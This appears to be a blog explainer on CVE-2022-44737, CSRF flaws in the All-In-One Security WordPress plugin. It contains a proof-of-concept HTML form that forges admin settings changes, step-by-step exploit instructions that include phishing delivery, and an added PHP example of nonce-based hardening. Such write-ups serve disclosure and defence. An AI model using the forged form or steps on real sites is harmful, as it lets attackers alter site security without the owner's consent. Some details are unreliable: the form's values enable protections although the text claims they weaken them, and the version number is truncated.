All-In-One Security (AIOS) – Security and Firewall is a popular WordPress plugin designed to help administrators effortlessly manage the security of their websites. With over 900,000 active installations, AIOS offers protection against brute force attacks, file change monitoring, and other advanced security features. However, a recent investigation has revealed some troubling findings about this plugin.

The latest version of the AIOS plugin (up to version 5.1.) suffers from multiple Cross-Site Request Forgery (CSRF) vulnerabilities. These flaws allow a malicious third party to execute unauthorized actions that could potentially compromise a WordPress website's security. This blog post examines the CVE-2022-44737 vulnerability, provides code snippets to replicate the issue, and offers details on how to exploit it.

Original References

The CVE-2022-44737 vulnerability in the All-In-One Security (AIOS) plugin was first reported in the following sources:

1. CVE-2022-44737: National Vulnerability Database (NVD) - https://nvd.nist.gov/vuln/detail/CVE-2022-44737
2. WPScan Vulnerability Database - https://wpscan.com/vulnerability/cbf049ae-b38f-4289-8efc-4e44cde1cdc4

Vulnerability Details

The Cross-Site Request Forgery (CSRF) vulnerabilities affect several modules within AIOS, including the Brute Force Protection, IP Blacklisting, and File Change Monitoring modules. A lack of proper CSRF tokens or security nonces makes these modules susceptible to attacks.

For instance, an attacker can exploit these vulnerabilities to disable or reset security settings, deactivate AIOS protection features, or make administrative changes in a WordPress website without the website owner's consent or knowledge.

Code Snippet

To reproduce the CSRF vulnerability that affects the Brute Force Protection module, an attacker can craft a malicious HTML form that performs unauthorized changes to the AIOS plugin settings. Here is an example of such a form:

<!DOCTYPE html>
<html>
    <body>
        <h1>MALICIOUS FORM</h1>
        <form method="POST" action="https://target-wordpress-website.com/wp-admin/admin.php?page=aiowpsec">
            <input type="hidden" name="aiowps_brute_force_attack_prevention" value="1" />
            <input type="hidden" name="aiowps_enable_brute_force_attack_prevention" value="1" />
            <input type="hidden" name="aiowps_enable_login_activity_log" value="1" />
            <!-- Add more malicious input fields here -->
            <input type="submit" value="Click me" />
        </form>
    </body>
</html>

When a logged-in WordPress administrator visits this malicious webpage and submits the form, the attacker can effectively modify AIOS settings in a way that weakens the site's security. The other CSRF vulnerabilities in the plugin can be exploited through a similar approach.
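The root cause named under Vulnerability Details is a settings handler that accepts a POST without a CSRF token or WordPress nonce. The following is an added example, not code from the AIOS plugin or from the original post: it places a handler in that vulnerable shape beside the hardened form WordPress expects, where the settings form carries a nonce bound to the logged-in user and the handler verifies it with check_admin_referer(). The function, action and page names (csrfdemo_*) are hypothetical; the field name aiowps_enable_brute_force_attack_prevention is taken from the form above, and its use as a wp_options key here is an assumption, not something the page states about AIOS.

```php
<?php
/**
 * Added example, not AIOS code. The csrfdemo_* names are hypothetical.
 * Using aiowps_enable_brute_force_attack_prevention as an option key is an
 * assumption taken from the field name in the post's form.
 */

// --- Vulnerable pattern: only the capability is checked, never the request origin. ---
function csrfdemo_save_settings_vulnerable() {
    // A cross-site POST issued by a logged-in administrator's browser carries
    // the admin's cookies, so this test passes and the setting is overwritten.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    update_option(
        'aiowps_enable_brute_force_attack_prevention',
        isset( $_POST['aiowps_enable_brute_force_attack_prevention'] ) ? '1' : '0'
    );
    wp_safe_redirect( admin_url( 'admin.php?page=csrfdemo' ) );
    exit;
}

// --- Hardened pattern, step 1: the form embeds a nonce for this specific action. ---
function csrfdemo_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="csrfdemo_save_settings" />
        <?php wp_nonce_field( 'csrfdemo_save_settings', 'csrfdemo_nonce' ); ?>
        <label>
            <input type="checkbox" name="aiowps_enable_brute_force_attack_prevention" value="1"
                <?php checked( get_option( 'aiowps_enable_brute_force_attack_prevention' ), '1' ); ?> />
            Enable brute force attack prevention
        </label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// --- Hardened pattern, step 2: the handler refuses any POST without a valid nonce. ---
function csrfdemo_save_settings_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // check_admin_referer() validates the nonce against the current user, the
    // action string and the nonce lifetime (12 to 24 hours by default) and
    // stops the request with an error page when it is missing or invalid.
    // A form hosted on a third-party site cannot obtain a valid nonce value.
    check_admin_referer( 'csrfdemo_save_settings', 'csrfdemo_nonce' );

    update_option(
        'aiowps_enable_brute_force_attack_prevention',
        isset( $_POST['aiowps_enable_brute_force_attack_prevention'] ) ? '1' : '0'
    );
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'admin.php?page=csrfdemo' ) ) );
    exit;
}
add_action( 'admin_post_csrfdemo_save_settings', 'csrfdemo_save_settings_hardened' );
```

The capability check alone is what the vulnerable handler relies on, and it is exactly the check a CSRF request satisfies, because the victim's browser attaches the administrator's session cookies automatically. The nonce is the piece the attacker's page cannot supply: it is derived from the user's session token and the action name, so the cross-site form from the post fails at check_admin_referer() before any option is written. Reviewing a plugin for this class of bug therefore comes down to finding every state-changing handler and confirming that a wp_verify_nonce() or check_admin_referer() call guards it.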

Exploit Details

To exploit the CSRF vulnerabilities in the All-In-One Security (AIOS) plugin, an attacker must perform the following steps:

1. Identify a target website running a vulnerable version of the AIOS plugin (<= 5.1.).
2. Craft a malicious CSRF form that targets the desired vulnerable module (e.g., Brute Force Protection, IP Blacklisting, File Change Monitoring).
3. Host the malicious form on a website or deliver it through phishing emails or Internet forums.
4. Entice the target WordPress administrator to visit the malicious webpage or submit the forged request while logged in.
5. Without the administrator's knowledge, the attacker's desired changes are carried out and the attack is successful.

Recommendation

To protect your WordPress website from CSRF vulnerabilities in the All-In-One Security (AIOS) plugin, update the plugin to the latest version immediately. WordPress administrators should always be wary of suspicious links and ensure that they use a reliable security plugin to shield their websites from potential threats.

Conclusion

The CVE-2022-44737 vulnerability reveals the risk posed by multiple Cross-Site Request Forgery vulnerabilities in popular security plugins like All-In-One Security (AIOS). These vulnerabilities can compromise the security of WordPress websites, putting sensitive data and user privacy at risk. Always maintain the latest version of the software and plugins to safeguard your site from such threats.

Timeline

Published on: 11/22/2022 16:15:00 UTC
Last modified on: 11/28/2022 15:05:00 UTC